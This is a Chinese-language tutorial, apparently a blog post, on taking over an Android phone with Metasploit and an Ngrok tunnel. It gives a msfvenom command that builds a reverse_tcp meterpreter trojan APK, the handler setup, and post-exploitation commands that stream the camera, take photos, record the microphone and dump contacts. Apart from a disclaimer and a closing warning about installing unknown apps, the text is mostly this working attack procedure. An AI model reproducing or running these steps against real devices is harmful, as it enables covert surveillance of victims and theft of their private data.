通过Metasploit+小米球实现内网穿透入侵安卓手机

一. 前言:

严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。

实验目的:演示如何使用Kali里的Metasploit控制安卓手机

内网穿透原理:内网穿透相当于先将数据发给服务器,然后由服务器发给内网中的我们

 

二. 环境准备

注:具体下载和使用方法我就不讲了,百度上都有,讲起来太长了

1.kali linux(攻击方)

2.Ngrok(小米球)

下载linux版本并注册一个帐号来开通一个免费的隧道,用于接下来的端口映射

3.安卓模拟器(因为博主没有安卓手机,所以用模拟器)

注:比较推荐用模拟器,因为这个漏洞挺久远的,所以不支持高版本的手机,目前我测试了7.0以上好像是不行的(至少我没成功,有成功的欢迎来教教我),靶机我用的是版本为5.1的安卓

 

三. 开始实验

1. 启动内网穿透工具Ngrok

命令: ./xiaomiqiu_start.sh(在xiaomiqiu文件右击在此打开终端并输入此命令)

2.查看kali的ip

命令:ifconfig

3. 用Metasploit生成载有恶意Payload的Android的apk

命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.121.128 lport=8080 R > what.apk

解释: lhost=192.168.121.128 (这是Kali的IP)lport=8080 (默认4444,可以自定义,这里要与Ngrok的相同)

4. 启动msfconsole,设置模块

命令1:msfconsole

命令2:use exploit/multi/handler

5. 设置payload和监听

set payload android/meterpreter/reverse_tcp //选择Payload
set lhost 192.168.121.128  //这里的地址设置成我们刚才生成木马的IP地址
set lport 8080      //这里的端口设置成刚才我们生成木马所监听的端口

6. 检查配置是否正确

命令:options

 

四.攻击

1. 入侵

命令:exploit或者run

这个时候就监听就开启了,然后使用手机安装刚才生成的病毒文件(拉文件就不用演示了吧)

2. 此时手动点击刚才手机中安装的MainActivity程序图标(没有界面)

3.当受害者点击以后便可成功建立攻击会话

 

五. 攻击命令

1.开启摄像头并录像

命令:webcam_stream

2.查看手机系统信息

命令:sysinfo

3.导出手机通讯录

命令:dump_contacts

4.调用摄像头拍照

命令:webcam_snap

5.录制声音

命令: record_mic

6.成功建立攻击会话后可以对受害者手机进行像Linux主机shell一样对手机进行命令执行操作

 


至此,本次演示结束,其他一些命令我就不一一演示了,有兴趣的话可自行借助help命令或者?给出的使用命令描述进行体验。

温馨提示:请不要随便安装陌生人的软件,可能会泄露自己的隐私!